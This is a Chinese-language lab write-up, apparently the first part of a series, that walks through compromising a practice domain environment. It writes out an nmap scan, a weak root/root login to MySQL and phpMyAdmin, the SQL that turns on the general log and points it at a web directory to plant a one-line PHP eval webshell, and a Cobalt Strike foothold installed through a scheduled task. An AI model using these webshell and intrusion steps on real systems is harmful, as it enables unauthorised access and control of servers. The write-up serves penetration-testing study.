实战打靶 - 巧用smb拿下不出网主机（上）

Delina

原文链接：实战打靶 - 巧用smb拿下不出网主机（上）
0x01 前言

之前在打一个域环境的时候出现了域内主机不出网的情况，当时用的是cs的socks代理将不出网主机的流量代理到了边缘主机上。当时没有考虑太多，下来之后想到搭一个环境复现一下当时的情况，看有没有更简便的方法能够打下不出网的主机。

机缘巧合之下，发现了这个域环境还不错，再复现的过程中也有一些知识触及了我的知识盲区，也收获了许多新的知识。特地把过程记录下来，与想要学习打域内不出网主机的师傅们共同分享。

0x02 靶场地址分配
内网网段：192.168.52.0/24
外网网段：192.168.10.0/24

攻击机：
kali：192.168.10.11

靶场：
win7(内)：192.168.52.143
win7(外)：192.168.10.15

域内主机：
Winserver2003：192.168.52.141
Winserver2008：192.168.52.138

---

其中win7可以外网、内网通信，域内主机只能内网之间进行通信
​
​
​

一开始DCping不通win7，win7关闭防火墙之后可以ping通
​

打开C盘下的phpstudy目录打开web服务
​

0x03 web服务器渗透
nmap探测端口

• 
  

nmap -sS -P0 -sV -O 192.168.10.15
​

开了80端口，尝试访问web地址，发现为php探针
​

滑到最底部，发现网站底部有一个MySQL数据库连接检测
​

弱口令root/root连接成功
​

扫描后台我这里用的是御剑，但是好像很拉，因为在我打完这个靶场之后再去网上看的时候发现他们很多扫出来一个cms，通过cms也能拿shell，这里我就不演示怎么用cms弱口令进后台写shell了，如果有感兴趣的小伙伴可以自行搜索一下
​

发现phpmyadmin目录，还是root/root弱口令登陆成功
​

进入后界面如下所示
​

通过phpmyadmin写shell通过phpmyadmin写shell有两种方式，首先我尝试select into outfile直接写入，但是他这里secure_file_priv的值为NULL，所以无法提权
​

只能使用另外一种方法，用全局日志写shell

• 
  

SHOW VARIABLES LIKE '%general%'

查看配置，可以看到全局日志是处于关闭的状态，gengeral_log_file返回了日志的绝对地址
​

那这里我先把它的全局日志打开，再往它路径里面写入一个一句话木马

• 
  

set global general_log = on;
​

开启全局日志后修改绝对路径，注意这里有一个坑，日志给我们返回的路径是C:\\phpStudy\\MySQL\\data\\stu1.log，但是mysql访问的绝对地址为C:\\phpStudy\\WWW目录下的文件，所以这个地方写shell必须要写到WWW目录下才能够用蚁剑连接上

• 
  

set global general_log_file='C:\\phpStudy\\WWW\\shell.php';
​

这里再写入一句话木马

• 
  

select '<?php eval($_POST[cmd]);?>'
​

然后再上蚁剑连接即可
​

可以看到连接成功
​

0x04 内网信息搜集
查看下系统的权限，一上来就是administrator权限就很舒服
​

ipconfig /all查看网络信息，域环境+双网卡
​
​

tasklist /svc粗略看了一下，似乎是没有杀软的
​

想着没有杀软，那么直接用最简单粗暴的上cs更省心，上传一个cs生成的木马exe到目标主机上
​

用计划任务上线cs
​

成功上线
​